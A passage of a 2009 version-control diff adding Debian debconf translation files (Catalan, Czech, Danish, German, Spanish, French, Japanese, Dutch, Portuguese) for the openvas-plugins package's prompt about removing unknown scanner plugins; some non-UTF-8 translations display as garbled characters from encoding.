You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Nota: s'aplicarà a totes les noves instal·lacions/actualitzacions del paquet " +"fins que el reconfigureu. Si teniu intenció d'utilitzar el nessus-pupdate-" +"plugins en un futur contesteu 'No'." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Tot i això, si heu baixat connectors per a una versió antiga del Nessus " +#~ "(per exemple de la 1.x) probablement no funcionin correctament amb les " +#~ "versions noves i és aconsellable suprimir-los." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/cs.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/cs.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/cs.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,78 @@ +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans +# +# Developers do not need to manually edit POT or PO files. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2005-03-05 16:31+0100\n" +"Last-Translator: Miroslav Kure \n" +"Language-Team: Czech \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=ISO-8859-2\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Odstranit neznámé moduly Nessusu?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Adresáø /var/lib/nessus/plugins obsahuje nìjaké neznámé moduly. To je " +"pravdìpodobnì zpùsobeno tím, ¾e jste je stáhli ruènì (tøeba skriptem nessus-" +"update-plugins). 
Momentálnì máte nainstalováno ${countnewplugs} modulù, " +"které nejsou poskytovány tímto balíkem." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Poznámka: Nastavení se bude vztahovat na v¹echny nové instalace/aktualizace " +"tohoto balíku do té doby, ne¾ jej pøekonfigurujete. Plánujete-li v budoucnu " +"pou¾ívat nessus-update-plugins, mìli byste odpovìdìt 'Ne'." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Jestli¾e jste stáhli moduly pro star¹í verzi Nessusu (napø. 1.x), není " +#~ "zaruèeno, ¾e budou pracovat s novìj¹ími verzemi programu a nìkdy je lep¹í " +#~ "je smazat." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/da.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/da.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/da.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,68 @@ +# translation of nessus-plugins_2.0.9-2_templates.po to Danish +# Claus Hindsgaul , 2004. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.0.9-2_templates\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-02-18 20:43+0100\n" +"Last-Translator: Claus Hindsgaul \n" +"Language-Team: Danish \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"X-Generator: KBabel 1.0.2\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Fjern ukendte Nessus-indstik?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Mappen /var/lib/nessus/plugins indeholder nogle ukendte indstik. Det er " +"sikkert fordi du har hentet yderligere indstik (f.eks. ved at køre nssus-" +"update-plugins). Du har ${countnewplugs} indstik, som ikke hører til pakken." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." 
+msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Bemærk: Dette vil gælde for alle dine nyinstallationer og opgraderinger af " +"denne pakke, indtil du omkonfigurerer den. Du bør afvise, hvis du regner med " +"at bruge nessus-update-plugins i fremtiden." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Dog, hvis du har hentet indstik til en ældre Nessus-version (f.eks. 1.x), " +#~ "kan det være at de ikke fungerer ordentligt med nyere Nessus-versioner, " +#~ "sÃ¥ det er nogle gange tilrÃ¥deligt at fjerne dem." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/de.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/de.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/de.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,79 @@ +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans# +# Developers do not need to manually edit POT or PO files. +# Erik Schanze , 2004. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.0.12-1_templates\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-08-10 16:00+0200\n" +"Last-Translator: Erik Schanze \n" +"Language-Team: German \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"X-Generator: KBabel 1.3.1\n" +"Plural-Forms: nplurals=2; plural=(n != 1);\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Unbekannte Nessus-Plugins entfernen?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Im Verzeichnis /var/lib/nessus/plugins liegen einige unbekannte Plugins. 
" +"Wahrscheinlich haben Sie zusätzliche Plugins heruntergeladen (z. B. durch " +"das Kommando nessus-update-plugins). Momentan sind dort ${countnewplugs} " +"Plugins, die nicht vom Paket bereitgestellt werden." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Achtung: Das wird für alle weiteren Installationen bzw. Aktualisierungen " +"zutreffen bis Sie das anders einrichten. Sie sollten ablehnen, wenn Sie " +"nessus-update-plugins in Zukunft nutzen möchten." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Auch wenn Sie Plugins einer älteren Haupt-Version von Nessus (z. B. 1.x) " +#~ "herunterladen, funktionieren diese eventuell nicht richtig mit neueren " +#~ "Versionen von Nessus, deshalb ist es manchmal nötig, sie zu löschen." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/es.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/es.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/es.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,73 @@ +# +# nessus-plugins translation to spanish +# Copyright (C) 2003 Software in the Public Interest +# This file is distributed under the same license as the OpenVAS package. +# +# Changes: +# - Initial translation +# Javier Fernandez-Sanguino Peña , 2003 +# - Updated by Javier Fernández-Sanguino Peña +# +# +# Traductores, si no conoce el formato PO, merece la pena leer la +# documentación de gettext, especialmente las secciones dedicadas a este +# formato, por ejemplo ejecutando: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# +# Equipo de traducción al español, por favor lean antes de traducir +# los siguientes documentos: +# +# - El proyecto de traducción de Debian al español +# http://www.debian.org/intl/spanish/coordinacion +# especialmente las notas de traducción en +# http://www.debian.org/intl/spanish/notas +# +# - La guía de traducción de po's de debconf: +# /usr/share/doc/po-debconf/README-trans +# o http://www.debian.org/intl/l10n/po-debconf/README-trans +# +msgid "" +msgstr "" +"Project-Id-Version: openvas-plugins 0.9.0-1\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2003-12-24 19:07+0100\n" +"Last-Translator: Javier Fernandez-Sanguino Peña \n" +"Language-Team: Spanish \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "Remove unknown OpenVAS plugins?" +msgstr "¿Eliminar pruebas de OpenVAS desconocidas?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." 
+msgstr "" +"El directorio /var/lib/openvas/plugins contiene algunas pruebas de seguridad " +"desconocidas. Esto probablemente se debe a que descargó pruebas en este " +"directorio (por ejemplo, al ejecutar openvas-update-plugins). Actualmente vd. " +"tiene ${countnewplugs} prueba(s) que no están incluidas en este paquete." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Nota: Esto será aplicable a todas las instalaciones o actualizaciones que se " +"hagan de este paquete hasta que lo reconfigure. Diga 'No' si desea utilizar " +"openvas-update-plugins en el futuro." + Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/fr.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/fr.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/fr.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,78 @@ +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans# +# Developers do not need to manually edit POT or PO files. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.0.9-2\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-01-11 15:27+0100\n" +"Last-Translator: Michel Grentzinger \n" +"Language-Team: French \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=ISO-8859-15\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Faut-il supprimer les greffons inconnus de Nessus ?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Le répertoire /var/lib/nessus/plugins contient des greffons (« plugins ») " +"inconnus. Vous avez sans doute dû télécharger des greffons supplémentaires " +"dans ce répertoire (p. ex. 
en exécutant nessus-update-plugins). Vous avez " +"actuellement ${countnewplugs} greffon(s) qui ne sont pas fournis par ce " +"paquet." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Note : cela s'appliquera à toutes les nouvelles installations ou mises à " +"jour de ce paquet tant que vous ne l'aurez pas reconfiguré. Vous devriez " +"refuser si vous avez l'intention d'utiliser plus tard nessus-update-plugins." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Cependant, si vous avez téléchargé des greffons pour une ancienne version " +#~ "majeure de Nessus (p. ex. pour la version 1.x), ils ne fonctionneront " +#~ "sans doute pas convenablement avec des versions plus récentes de Nessus. " +#~ "Ainsi, il est parfois recommandé de les supprimer." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ja.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ja.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ja.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,79 @@ +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans +# +# Developers do not need to manually edit POT or PO files. +# +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.0.10a-2\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-04-28 03:02+0900\n" +"Last-Translator: Hideki Yamane \n" +"Language-Team: Japanese \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=EUC-JP\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "ÉÔÌÀ¤Ê Nessus ¥×¥é¥°¥¤¥ó¤òºï½ü¤·¤Þ¤¹¤«?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." 
+msgstr "" +"/var/lib/nessus/plugins ¥Ç¥£¥ì¥¯¥È¥ê¤ËÉÔÌÀ¤Ê¥×¥é¥°¥¤¥ó¤¬´Þ¤Þ¤ì¤Æ¤¤¤Þ¤¹¡£¤³¤ì" +"¤Ï¶²¤é¤¯Äɲåץ饰¥¤¥ó¤ò¥À¥¦¥ó¥í¡¼¥É¤·¤¿¤â¤Î¤È»×¤ï¤ì¤Þ¤¹(Îã: nessus-update-" +"plugins ¤ò¼Â¹Ô¤Ê¤É¤Ë¤è¤ë¤â¤Î)¡£¸½ºß¡¢¤³¤Î¥Ñ¥Ã¥±¡¼¥¸¤Ë¤Ï´Þ¤Þ¤ì¤Æ¤¤¤Ê¤¤ " +"${countnewplugs} ¸Ä¤Î¥×¥é¥°¥¤¥ó¤¬¤¢¤ê¤Þ¤¹¡£" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Ãí°Õ: ¤³¤³¤Ç¤ÎÁªÂò¤Ï¡¢ºÆÀßÄê¤ò¹Ô¤¦¤Þ¤Ç¡¢¤³¤Î¥Ñ¥Ã¥±¡¼¥¸¤Î¿·µ¬¥¤¥ó¥¹¥È¡¼¥ëµÚ¤Ó" +"¥¢¥Ã¥×¥°¥ì¡¼¥ÉÁ´¤Æ¤ËŬÍѤµ¤ì¤Þ¤¹¡£º£¸å¡¢nessus-update-plugins ¤òÍøÍѤ¹¤ë¤Ä¤â" +"¤ê¤Ç¤¢¤ì¤Ð¡¢'¤¤¤¤¤¨' ¤ÈÅú¤¨¤ëÊý¤¬Îɤ¤¤Ç¤·¤ç¤¦¡£" + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "¤·¤«¤·¡¢°ÊÁ°¤Î¥á¥¸¥ã¡¼¥Ð¡¼¥¸¥ç¥ó (¤Ä¤Þ¤ê 1.x) ¤Î Nessus ÍѤ˥ץ饰¥¤¥ó¤ò¥À" +#~ "¥¦¥ó¥í¡¼¥É¤·¤Æ¤¤¤¿¾ì¹ç¡¢¿·¤·¤¤¥Ð¡¼¥¸¥ç¥ó¤Î Nessus ¤Ç¤Ï¤³¤ì¤é¤ÏÀµ¤·¤¯Æ°ºî¤·" +#~ "¤Ê¤¤¤Î¤Ç¡¢ºï½ü¤¹¤ë¤Î¤¬¤ª¤½¤é¤¯Ë¾¤Þ¤·¤¤¤Ç¤·¤ç¤¦¡£" Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/nl.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/nl.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/nl.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,84 @@ +# translation of nessus-plugins_2.2.8-1_templates.po to Debian l10n Dutch +# This file is distributed under the same license as the nessus-plugins package +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans# +# Developers do not need to manually edit POT or PO files. +# +# Kurt De Bree , 2006 +# This is an unofficial translation +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.2.8-1_templates\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2006-07-18 19:13+0200\n" +"Last-Translator: Kurt De Bree \n" +"Language-Team: Debian l10n Dutch <>\n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"X-Generator: KBabel 1.9.1\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Onbekende Nessus plugins verwijderen?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). 
You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"De map /var/lib/nessus/plugins bevat een aantal onbekende plugins. Dit is " +"waarschijnlijk omdat u extra plugins erin gedownload hebt (bijv. door " +"'nessus-update-plugins' uit te voeren). U heeft momenteel ${countnewplugs} " +"plugin(s) die niet door dit pakket aangeboden worden." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Merk op: Dit is van toepassing op al uw nieuwe installaties/opwaarderingen " +"van dit pakket totdat u het herconfigureert. U dient 'Nee' te antwoorden als " +"u in de toekomst van plan bent om 'nessus-update-plugins' te gebruiken." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Nochtans, als u plugins gedownload heeft voor een oudere hoofdversie van " +#~ "Nessus (bijv. van 1.x), bestaat de mogelijkheid dat deze niet behoorlijk " +#~ "werken met de nieuwere versies van Nessus. Daardoor is het soms " +#~ "aangewezen ze te verwijderen." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,71 @@ +# translation of nessus-plugins debconf to Portuguese +# Copyright (C) 2007 Américo Monteiro +# This file is distributed under the same license as the nessus-plugins package. +# +# Américo Monteiro , 2007. +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.2.9-1.1\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2007-07-22 03:59+0100\n" +"Last-Translator: Américo Monteiro \n" +"Language-Team: Portuguese \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"X-Generator: KBabel 1.11.4\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Remover plugins desconhecidos do Nessus?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"O directório /var/lib/nessus/plugins inclui alguns plugins desconhecidos. " +"Isto provavelmente porque você descarregou plugins adicionais (ex. usando " +"nessus-update-plugins). Correntemente você tem ${countnewplugs} plugin(s) os " +"quais não são fornecidos por este pacote." + +#. Type: boolean +#. 
Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Nota: Isto será aplicado a todas as suas novas instalações/actualizações " +"deste pacote até que o reconfigure. Você deverá dizer 'No' se planeia usar " +"nessus-update-plugins no futuro." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Contudo, se você descarregou plugins para uma versão principal antiga do " +#~ "Nessus (ex. para 1.x) eles podem não funcionar correctamente com novas " +#~ "versões do Nessus, então por vezes é aconselhável removê-los." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt_BR.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt_BR.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt_BR.po 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,71 @@ +# Brazilian Portuguese translation (nessus-plugins) +# Copyright (C) 2007 THE nessus-plugins'S COPYRIGHT HOLDER +# This file is distributed under the same license as the nessus-plugins package. +# Eder L. Marques , 2007. +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.2.8-1.1\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2007-03-27 01:30-0300\n" +"Last-Translator: Eder L. Marques \n" +"Language-Team: l10n Portuguese \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"pt_BR utf-8\n" +"X-Generator: KBabel 1.11.4\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Remover plugins desconhecidos do Nessus?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"O diretório /var/lib/nessus/plugins inclui alguns plugins desconhecidos. " +"Isto deve-se provavelmente por que você baixou plugins adicionais nele (e.g. " 